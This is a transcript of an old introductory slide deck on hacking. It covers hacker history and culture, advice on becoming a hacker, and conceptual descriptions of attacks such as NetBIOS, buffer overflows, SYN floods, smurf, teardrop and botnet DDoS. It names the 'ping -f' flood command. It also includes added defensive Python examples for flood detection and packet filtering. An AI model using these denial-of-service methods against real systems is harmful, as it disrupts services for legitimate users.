6552818 hacking software

Upload: edward-petriadis

Post on 03-Oct-2014

125 views

Category:

Documents


5 download

TRANSCRIPT

Page 1: 6552818 Hacking Software


Hacking


Index

• Evolution Hacking

• Hacking

• Introduction To Cyber Crime

• Special Attraction

• Viruses

• Hacking XP

• Glossary

• Prepared By


Evolution of Hacking

Astonishingly, hacking did not originate as an anti-social activity. The entire story of hacking started with the belief that there is always more than one way to solve a problem. People also wanted to access information free of cost at any time.

Computer hacking started in the late 1950s. Before that, computers and programming languages were not easily accessible. Problems were solved by repeating known and successful computing methods. To work on computers, people needed formal problems and predesigned solutions. Computers were allotted to professionals based on the priority of their requirements. The restricted use of computer resources reduced the chances for any experiments with early computers.

The authorities of the Massachusetts Institute of Technology (MIT) allowed people to access their TX-0 resources without any restrictions after official hours. That was the first time computer users got a chance to experiment with different methods for solving problems. In other words, that was the beginning of the hacker community. However, the prime aim of those hackers was to experiment with new solutions without any malevolent intent. The earlier hackers performed their activities with a strong belief that there is always space for enhancement. They performed their activities without any predefined structure or time schedule.

In parallel to computer hacking activities, a new type of hacker, the phreak, came into existence. Phreaks first accessed telephone networks by using handheld electronic devices. Phreaks used those devices to make modifications to pay telephones to make free telephone calls. To simulate payments in pay telephones, they used devices such as red boxes.

In the early 1980s, a new computing era started by connecting computers and telephone networks with the help of modems. Personal computers became popular. Users started to use modems and telephone networks to connect personal computers and mainframe computers. Access to the computers connected to the internet opened the entire world of computers to the hacker community. The rapid growth of internet technologies changed the profile of hackers.


Index

• What Is Hacking?

• How Do Hackers Hack?

• Classes Of Hacker

• How To Become A Hacker?

• Common Hacking Techniques

• Passwords

• Sniffers: Basics and Detection


What is Hacking?

Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.

What are Hackers?

Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Such a definition presents the term in a more positive light than is usually associated with it. Most people understand a hacker to be what is more accurately known as a 'cracker'.

What are Crackers?

Crackers are people who try to gain unauthorized access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer.

What damage can a Hacker do?

This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information.


How do Hackers hack?

There are many ways in which a hacker can hack. Some are as follows:

* NetBIOS
* ICMP Ping
* FTP
* rpc.statd
* HTTP

NetBIOS

NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet, so a hacker can access your machine remotely.

ICMP 'Ping' (Internet Control Message Protocol)

ICMP is one of the main protocols that make the Internet work. It stands for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could launch a more serious form of attack against it.

FTP (File Transfer Protocol)

FTP is a standard Internet protocol, standing for File Transfer Protocol. You may use it for file downloads from some websites. If you have a web page of your own, you may use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers. FTP normally requires some form of authentication for access to private files, or for writing to files. FTP backdoor programs, such as:

* Doly Trojan
* Fore
* Blade Runner

simply turn your computer into an FTP server, without any authentication.

Rpc.Statd

This is a problem specific to Linux and Unix. The problem is the infamous unchecked buffer overflow. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and is written into parts of memory it shouldn't be in. This can cause crashes of various kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds.

HTTP

HTTP stands for HyperText Transfer Protocol. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, part of the request gets written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server.


Classes of Hackers

Today, it is very difficult to distinguish between hackers, crackers, and script kiddies. Therefore, hackers have been categorized into different groups based on the nature of their tricks:

• White hats
• Black hats
• Gray hats

White Hats

White hat hackers use their skills and knowledge for good purposes. These hackers help to find out new security vulnerabilities and their solutions. White hats do not hack systems with any bad intent. They like experimenting and believe that there is always a better solution than the current one. White hat hackers always report the vulnerabilities they discover to the concerned security professionals. For example, a person who finds a weakness in a system and helps the system administrator implement better security measures is a white hat hacker.

Black Hats

Black hat hackers perform their activities with bad intentions. Black hats perform illegal activities, such as destroying data, denying services to legitimate users, and defacing Web sites. For example, a hacker who breaks into the network of a bank and steals thousands of dollars by transferring it to other banks is a black hat. Black hat hackers share their experiments with other crackers but not with the concerned security professionals.

Gray Hats

Gray hat hackers are those people who do not believe in categorizing hacking activities as good or bad. Gray hats believe that some of the activities which are condemned by white hats are harmless. Gray hat hackers might share the results of their experiments with both security professionals and crackers.


The Hacker Attitude

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. They're also important because becoming the kind of person who believes these things is important, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. (lots of these on alt.2600.hgackerz)

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. (so I would take it all hackers are wankers lol). You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done. (I agree)

2. Nobody should ever have to solve a problem twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do that get the most respect from other hackers. It's definitely OK to sell enough of it to keep you in food and rent and computers. It's OK to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like cooperation that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker.


How To Become A Hacker

Looking for advice on learning to crack passwords, sabotage systems, mangle websites, write viruses, and plant Trojan horses? You came to the wrong place.

Looking for advice on how to learn the guts and bowels of a system or network, get inside it, and become a real expert? Maybe I can help there. How you use this knowledge is up to you. I hope you'll use it to contribute to computer science and hacking (in its good sense), not to become a cracker or vandal.

This little essay is basically the answers to all the emails I get asking how to become a hacker. It's not a tutorial in and of itself. It's certainly not a guaranteed success. Just give it a try and see what happens. That said, here's where to start:

Be curious

Take things apart. Look under the hood. Dig through your system directories and see what's in there. View the files with hex editors. Look inside your computer. Wander around computer stores and look at what's there.

Read everything in sight

If you can afford it, buy lots of books. If you can't, spend time in libraries and online. Borrow books from friends. Go through tutorials. Read the help files on your system. If you're using Unix/Linux, read the man files. Check out the local college bookstores and libraries. And as you're reading, try things (see next paragraph).

Experiment

Don't be afraid to change things, just to see what'll happen. Do this long enough, of course, and you'll wipe out your system (see next paragraph), but that's part of becoming a hacker. Try command options and switches you've never tried before. Look for option menus on programs and see what they can do. In Windows, tweak your registry and see what happens. Change settings in .INI files. In Unix, dig around in the directories where you don't normally go. On the Macintosh, play around in the system folder.


Make backups

If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer.

Don't limit yourself

Who says a computer or network is the only place to hack? Take apart your telephone. Figure out your television (careful of the high voltage around the picture tube - if you fry yourself, it's not my fault) and VCR. Figure out how closed captioning works (that was a plug for my CaptionCentral.com Web site). Take apart your printer. Pick up the latest issues of Nuts & Volts and Midnight Engineer (you've obviously made a good start if you're reading Blacklisted! 411). Take apart the locks on your doors. Figure out how your radio works. Be insatiably curious and read voraciously. There are groups you can learn from. There are whole Web sites devoted to hacking TiVo units, for example.

Get some real tools

You can't cut a board in half with a screwdriver. Well, maybe you can, but it'll take a long time. Dig around and find the proper tools for the operating systems you're using. They're out there on the Web. You can get some pretty good stuff as shareware or freeware (especially on Linux). The serious power tools often cost serious money. What kinds of tools? Hex file editors. Snoopers that analyze system messages and network traffic. Compilers and APIs for programming. Scripting tools. Disk editors/formatters. Disassemblers. When you get good, write some of your own.

Learn to program

If you want to be a hacker, you're going to have to learn to program. The easiest way to start depends on the operating system you're using. The choice of language is very individual. It's almost a religious thing. Suggest a programming language to a beginner, and someone will disagree. Heck, you'll probably get flamed for it in a newsgroup. In Unix, I'd suggest getting started with Perl. Buy a copy of the camel book (Programming Perl) and the llama book (Learning Perl). You'll have the fundamentals of programming really fast! The best part is that the language itself is free. In Windows, you can get started quickly using a visual development environment like Visual Basic or Java. No matter what the system, if you want to get serious, you'll eventually need to learn C (or C++ or C# or some other variant). Real hackers know more than one programming language, anyway, because no one language is right for every task.

Learn to type

Hackers spend a lot of time at their keyboards. I type 90+ wpm (according to the Mavis Beacon typing tutor). HackingWiz (of hackers.com and Hacker's Haven BBS fame) says he can type 140+ wpm. The typing tutor may be boring, but it pays off.

Use real operating systems

Windows 95/98/Me is a shell on top of a 32-bit patch to a 16-bit DOS. Get some real operating systems (Linux, Windows NT, Mac OS, OS/2...) and learn them. You can't call yourself a linguist if you only know one language, and you certainly can't call yourself a hacker if you only know one OS. Linux is a hacker's dream. All the source code is freely available. Play with it, analyze it, learn it. Eventually, perhaps you can make a contribution to Linux yourself. Who knows, you might even have a chance to write your own OS.

Talk to people

It's hard to learn in a vacuum. Take classes. Join users groups or computer clubs. Talk to people on IRC or newsgroups or Web boards until you find people to learn with. That can take a while. Every third message on newsgroups like alt.hack* is "teach me to hack." Sigh. The best way to be accepted in any group is to contribute something. Share what you learn, and others will share with you.

Do some projects

It's important to pick some projects and work until you've finished them. Learning comes from doing, and you must follow the project through start to finish to really understand it. Start really simple. Make an icon. Customize your system (the startup screen on Win95, or the prompt on Unix). Make a script that performs some common operation. Write a program that manipulates a file (try encrypting something).


Learn to really use the Internet

Start with the Web. Read the help for the search engines. Learn how to use Boolean searches. Build up an awesome set of bookmarks. Then move on to other Internet resources. Get on Usenet. Find some underground BBSs. Get on IRC. You'll find useful information in the strangest places. Get to the point where you can answer your own questions. It's a whole lot faster than plastering them all over various newsgroups and waiting for a serious answer.

Once you've gone through these steps, go out and contribute something. The Internet was built by hackers. Linux was built by hackers. Usenet was built by hackers. Sendmail was built by hackers. Be one of the hackers that builds something.


Common Hacking Techniques

The various hacking techniques include:

• Denial-of-service
• Trojan Horses
• Spoofing
• Sniffing
• Password Cracking

Denial-of-Service attacks

Methods of attacks

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include:

• Attempts to "flood" a network, thereby preventing legitimate network traffic;
• Attempts to disrupt a server by sending more requests than it can possibly handle, thereby preventing access to a service;
• Attempts to prevent a particular individual from accessing a service;
• Attempts to disrupt service to a specific system or person.

Attacks can be directed at any network device, including attacks on routing devices and Web, electronic mail, or Domain Name System servers.

A DoS attack can be perpetrated in a number of ways. There are three basic types of attack:

1. Consumption of computational resources, such as bandwidth, disk space, or CPU time;
2. Disruption of configuration information, such as routing information;
3. Disruption of physical network components.

In addition, the US-CERT has provided tips on the manifestations of DoS attacks:

• Unusually slow network performance (opening files or accessing web sites)
• Unavailability of a particular web site
• Inability to access any web site
• Dramatic increase in the number of spam emails received


SYN floods


A SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for a TCP/ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections consume resources on the server and limit the number of connections the server is able to make, reducing the server's ability to respond to legitimate requests until after the attack ends.

When a computer wants to make a TCP/IP connection (the most common internet connection) to another computer, usually a server, an exchange of TCP/SYN and TCP/ACK packets of information occurs. The computer requesting the connection, usually the client's or user's computer, sends a TCP/SYN packet which asks the server if it can connect. If the server will allow connections, it sends a TCP/SYN-ACK packet back to the client to say "Yes, you may connect" and reserves a space for the connection, waiting for the client to respond with a TCP/ACK packet detailing the specifics of its connection.

In a SYN flood the address of the client is often forged so that when the server sends the go-ahead back to the client, the message is never received because the client either doesn't exist or wasn't expecting the packet and subsequently ignores it. This leaves the server with a dead connection, reserved for a client that will never respond. Usually this is done to one server many times in order to reserve all the connections for unresolved clients, which keeps legitimate clients from making connections.

The classic example is that of a party. Only 50 people can be invited to a party, and invitations are available on a first-come first-serve basis. Fifty letters are sent to request invitations, but the letters all have false return addresses. The invitations are mailed to the return addresses of the request letters. Unfortunately, all of the return addresses provided were fake, so nobody, or at least nobody of interest, receives the invitations. Now, when someone actually wants to come to the party (view the website), there are no invitations left because all the invitations (connections) have been reserved for 50 supposed people who will never actually show up.
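The half-open table described above can be modelled in a few lines, which also makes the defender's side visible: what the server's backlog looks like while it is being exhausted, and what a monitor watching the same packets should count. The following is an added example, not code from the original presentation; the log lines, the 10.0.0.x / 198.51.100.x addresses and the tiny backlog of four slots are all constructed for illustration.

```python
from collections import OrderedDict

# Constructed sample of packets arriving at a server, "time src_ip flag".
# 10.0.0.x are real clients; 198.51.100.x are forged sources that never
# answer the SYN-ACK. This is not captured traffic.
SAMPLE_LOG = """\
0.00 10.0.0.5 SYN
0.05 10.0.0.5 ACK
1.00 198.51.100.1 SYN
1.01 198.51.100.2 SYN
1.02 198.51.100.3 SYN
1.03 198.51.100.4 SYN
1.04 198.51.100.5 SYN
1.50 10.0.0.6 SYN
2.00 10.0.0.6 SYN
"""

BACKLOG = 4  # deliberately tiny so exhaustion is visible; real listen queues are larger


def parse_events(text):
    """Turn the log text into (time, src, flag) tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            t, src, flag = line.split()
            events.append((float(t), src, flag))
    return events


def simulate_backlog(events, backlog=BACKLOG, syn_timeout=60.0):
    """Model the server's half-open table: a SYN reserves a slot until the
    client's ACK completes the handshake or the entry times out."""
    half_open = OrderedDict()   # src -> time the SYN arrived
    established = 0
    refused = []                # SYNs dropped because every slot was taken
    for t, src, flag in events:
        # Expire stale half-open entries (none expire in the sample, but a
        # real table must do this or it never recovers after the flood).
        for stale in [s for s, t0 in half_open.items() if t - t0 > syn_timeout]:
            del half_open[stale]
        if flag == "SYN":
            if src in half_open:
                continue            # retransmitted SYN, slot already held
            if len(half_open) >= backlog:
                refused.append((t, src))
            else:
                half_open[src] = t
        elif flag == "ACK" and src in half_open:
            del half_open[src]
            established += 1
    return {"established": established, "refused": refused,
            "half_open": list(half_open)}


def detect_syn_flood(events, window=1.0, min_syns=5, max_completion=0.5):
    """Flag each window where many SYNs arrive but few handshakes complete.
    Per-source counting does not work here because every forged SYN comes
    from a different address, so the ratio is measured for the whole server."""
    alerts = []
    if not events:
        return alerts
    w, end = events[0][0], events[-1][0]
    while w <= end:
        in_win = [e for e in events if w <= e[0] < w + window]
        syns = sum(1 for e in in_win if e[2] == "SYN")
        acks = sum(1 for e in in_win if e[2] == "ACK")
        if syns >= min_syns and acks / syns <= max_completion:
            alerts.append((w, syns, acks))
        w += window
    return alerts


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    print(simulate_backlog(ev))   # 1 established, 3 refused, 4 slots stuck half-open
    print(detect_syn_flood(ev))   # [(1.0, 6, 0)]
```

Two things the run shows that the prose alone does not: the legitimate client 10.0.0.6 is refused even on retry, because the four forged entries hold their slots until the timeout, and the only reliable signal for a monitor is the ratio of SYNs to completed handshakes, since the forged sources are all distinct. On real hosts the usual mitigation is SYN cookies (net.ipv4.tcp_syncookies on Linux), which let the server avoid reserving a slot until the final ACK arrives.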


LAND attack

A LAND attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address and an open port as both source and destination. The attack causes the targeted machine to reply to itself continuously and eventually crash.

ICMP floods

A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on mis-configured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.
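The "filtering" the smurf paragraph mentions comes down to two ingress rules on a border router: packets arriving from outside must not claim a source inside your own network, and nothing from outside may be addressed to your broadcast address. The following added example (not part of the original presentation) implements both checks over a handful of constructed packets; the 198.51.100.0/24 internal range and the 203.0.113.9 external host are documentation addresses chosen for the illustration.

```python
import ipaddress

# The network behind the border router (constructed documentation range).
INTERNAL = ipaddress.ip_network("198.51.100.0/24")

# Constructed sample packets as seen on the router's *external* interface.
SAMPLE_PACKETS = [
    {"src": "203.0.113.9",   "dst": "198.51.100.255", "proto": "ICMP"},  # echo to broadcast
    {"src": "198.51.100.20", "dst": "198.51.100.255", "proto": "ICMP"},  # "internal" src from outside
    {"src": "203.0.113.9",   "dst": "198.51.100.20",  "proto": "ICMP"},  # ordinary ping
    {"src": "203.0.113.9",   "dst": "198.51.100.20",  "proto": "TCP"},   # ordinary connection
]


def is_directed_broadcast(dst, net=INTERNAL):
    """True if dst is the broadcast address of net. Older stacks also treated
    the all-zeros address as broadcast, so both are checked."""
    dst = ipaddress.ip_address(dst)
    return dst in (net.broadcast_address, net.network_address)


def border_filter(packets, net=INTERNAL):
    """Apply two ingress rules to packets arriving from outside:
    1. drop anything whose source claims to be inside our own network
       (it arrived on the external interface, so the source is spoofed);
    2. drop anything addressed to our broadcast address, which is what
       turns a network into a smurf amplifier.
    Returns (allowed, dropped); each dropped entry carries its reason so the
    decision can be logged."""
    allowed, dropped = [], []
    for p in packets:
        src = ipaddress.ip_address(p["src"])
        if src in net:
            dropped.append((p, "spoofed internal source on external interface"))
        elif is_directed_broadcast(p["dst"], net):
            dropped.append((p, "directed broadcast from outside"))
        else:
            allowed.append(p)
    return allowed, dropped


if __name__ == "__main__":
    ok, bad = border_filter(SAMPLE_PACKETS)
    for p, why in bad:
        print("DROP", p["src"], "->", p["dst"], ":", why)
    print(len(ok), "packets allowed")
```

The first rule is the same idea as BCP 38 ingress filtering and protects other people's networks from being flooded by reflections that carry your addresses; the second stops your own network from being used as the amplifier. Note that the ordinary ping to a single host passes, so the rules do not depend on blocking ICMP outright.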

UDP floods

UDP floods include "Fraggle attacks". In a fraggle attack an attacker sends a large amount of UDP echo traffic to IP broadcast addresses, all of it having a fake source address. It is a simple rewrite of the smurf attack code.

Teardrop attack

The Teardrop attack involves sending IP fragments with overlapping oversized payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code caused the fragments to be improperly handled, crashing the operating system as a result. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to 2.0.32 and 2.1.63 are vulnerable to this attack.
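What "improperly handled" means in the Teardrop paragraph is that the reassembler trusted the offset and length fields in the fragment headers. The added example below (not code from the original presentation, and a simplified model rather than any real kernel's reassembler) shows the check a parser or IDS should make on a fragment set before joining it, and exposes why the classic pattern, a second fragment that starts and ends inside the first, breaks an unchecked implementation. The fragment sets are constructed.

```python
# Constructed fragment sets: (offset_in_bytes, payload)
GOOD = [(0, b"A" * 8), (8, b"B" * 8), (16, b"C" * 4)]
# Teardrop pattern: the second fragment starts inside the first and also ends
# inside it, so a reassembler that trims the overlap and then computes
# "bytes to keep = end - offset" from the headers ends up with a negative length.
TEARDROP = [(0, b"A" * 36), (24, b"B" * 4)]


def validate_fragments(fragments):
    """Walk fragments in offset order and reject any overlap or gap instead of
    trusting the offsets in the headers. Returns (ok, reason)."""
    end = 0
    for off, data in sorted(fragments, key=lambda f: f[0]):
        frag_end = off + len(data)
        if off < end:
            kind = "contained in" if frag_end <= end else "overlapping"
            return False, f"fragment [{off},{frag_end}) {kind} previous data ending at {end}"
        if off > end:
            return False, f"gap between {end} and {off}"
        end = frag_end
    return True, "ok"


def naive_keep_length(prev_end, off, frag_end):
    """What an unchecked reassembler computes for the tail of an overlapping
    fragment after skipping the overlapped part. Shown only to make the
    failure visible: for the Teardrop pair it is negative, which an unsigned
    copy length turns into an enormous value."""
    return frag_end - max(off, prev_end)


def reassemble(fragments):
    """Return the reassembled payload, or None if the fragment set is rejected."""
    ok, _reason = validate_fragments(fragments)
    if not ok:
        return None
    return b"".join(data for _, data in sorted(fragments, key=lambda f: f[0]))


if __name__ == "__main__":
    print(reassemble(GOOD))                       # b'AAAAAAAABBBBBBBBCCCC'
    print(validate_fragments(TEARDROP))           # (False, 'fragment [24,28) contained in ...')
    print(naive_keep_length(36, 24, 28))          # -8
```

Rejecting the whole datagram on any overlap is the simple, safe policy; real stacks differ in whether they favour the first or the last overlapping fragment, and that difference is itself something an IDS has to model to see the same bytes the end host sees.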

Application level floods

On IRC, IRC floods are a common electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.


Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

A 'Pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results in a degraded quality of service and increased workload for the network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to its surreptitious nature.

Nukes

Nukes are malformed or specially crafted packets. WinNuke is a type of nuke, exploiting the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data is sent to TCP port 139 of the victim machine, causing it to lock up and display a Blue Screen of Death. This attack was very popular among IRC-dwelling script kiddies, due to the easy availability of a user-friendly click-and-crash WinNuke program.

Distributed attack

A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

Malware can carry DDoS attack mechanisms; one of the more well known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware, and no further interaction was necessary to launch the attack.


A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

These collections of compromised systems are known as botnets. DDoS tools like Stacheldraht still use classic DoS attack methods centered around IP spoofing and amplification like smurf and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes (see next section).

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals.

It is important to note the difference between a DDoS and DoS attack. If an attacker mounts a smurf attack from a single host it would be classed as a DoS attack. In fact, any attack against availability (e.g. using high-energy radio-frequency weapons to render computer equipment inoperable) would be classed as a Denial of Service attack, albeit an exotic one. On the other hand, if an attacker uses a thousand zombie systems to simultaneously launch smurf attacks against a remote host, this would be classed as a DDoS attack.

Reflected attack

A distributed reflected denial of service attack involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target.

ICMP Echo Request attacks (described above) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of misconfigured networks, thereby enticing a large number of hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.

Many services can be exploited to act as reflectors, some harder to block than others. DNS amplification attacks involve a newer mechanism that increases the amplification effect by using a much larger list of DNS servers than seen earlier.

Unintentional attack

This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example as part of a news story. The result is that a significant proportion of the primary site's regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack.

News sites and link sites — sites whose primary function is to provide links to interesting content elsewhere on the Internet — are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, Fark, Something Awful and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", "farking", "goonrushing" and "wanging" respectively.

Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have caused NTP vandalism by flooding NTP servers without respecting the restrictions on client types or geographical limitations.

Incidents

The first major attack involving DNS servers as reflectors occurred in January 2001. The attack was directed at the site Register.com. This attack, which forged requests for the MX records of AOL.com (to amplify the attack), lasted about a week before it could be traced back to all attacking hosts and shut off. It used a list of tens of thousands of DNS servers that was at least a year old at the time of the attack.

In July 2002, the Honeynet Project Reverse Challenge was issued. The binary that was analyzed turned out to be yet another DDoS agent, which implemented several DNS-related attacks, including an optimized form of a reflection attack...

Effects

Denial of service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted. This is another, more complex form of the DDoS, wherein the "zombies" can be located on the target system itself, thus increasing network traffic on either side of the target.

If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

Common malware

• Stacheldraht

• Tribe Flood Network

• Trinoo

Prevention and response

Surviving attacks

The investigative process should begin immediately after the DoS attack begins. There will be multiple phone calls, call backs, emails, pages and faxes between the victim organization, its provider and others involved. It is a time-consuming process, so it should begin immediately. It has taken some very large networks with plenty of resources several hours to halt a DDoS.

The easiest way to survive an attack is to have planned for it. Having a separate emergency block of IP addresses for critical servers with a separate route can be invaluable. A separate route (perhaps a DSL line) is not that extravagant, and it can be used for load balancing or sharing under normal circumstances and switched to emergency mode in the event of an attack. Filtering is generally rather ineffective, as the route to the filter will normally be swamped, so only a trickle of traffic will survive.

SYN cookies

SYN cookies modify the server's TCP handling by delaying allocation of resources until the client address has been verified. This seems to be the most powerful defense against SYN attacks. There are Solaris and Linux implementations. The Linux implementation can be turned on at runtime of the Linux kernel.
